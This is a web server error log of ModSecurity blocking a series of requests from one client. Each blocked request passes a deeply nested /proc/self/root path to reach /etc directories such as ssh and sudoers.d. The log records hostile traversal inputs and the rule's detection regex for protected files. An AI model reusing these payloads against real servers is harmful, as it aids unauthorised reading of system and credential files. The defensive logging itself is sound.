[Mon Mar 16 16:49:18.003307 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:50012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhevqTCbgAP5jq5TehAtwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:20.463320 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:50022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhewNSswJuvopo3lOhzDQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:22.997781 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.241.46:50026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhews_BxrYCr4hPDw_-RwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:24.443117 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:50040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhexP9ocpUE4ed4uDwGsAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:26.736102 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:50050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhexo6lpbStxTqkSkt-cQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:30.751502 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:36268] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheyrABkC4fWIHEf8EHfwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:32.111427 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:36270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhezLysWC90G-1nBrBX5QAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:33.601236 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.241.46:36286] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhezaTCbgAP5jq5TehAvAAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:39.450487 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:36294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe01ajLEzk2WiQ-10nIQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:40.787790 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:33586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe1KTCbgAP5jq5TehAvgAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:42.020661 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:33600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe1lajLEzk2WiQ-10nIgAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:43.374892 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.241.46:33612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe18_BxrYCr4hPDw_-TgAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:46.996531 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:33622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe2tSswJuvopo3lOhzFwAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:48.338997 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:38366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe3I6lpbStxTqkSkt-dwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:49.628358 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.241.46:38382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe3aQpVkWug9HeOt9JeQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:52.052587 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:38388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe4LysWC90G-1nBrBX6gAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:53.424366 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:38398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe4dSswJuvopo3lOhzGwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:55.795781 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:38412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe48_BxrYCr4hPDw_-VQAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:57.407499 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:38424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe5bysWC90G-1nBrBX7AAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:58.750216 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:51174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe5v9ocpUE4ed4uDwGtwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:00.016988 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:51178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe6KTCbgAP5jq5TehAwQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:01.628350 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:51188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 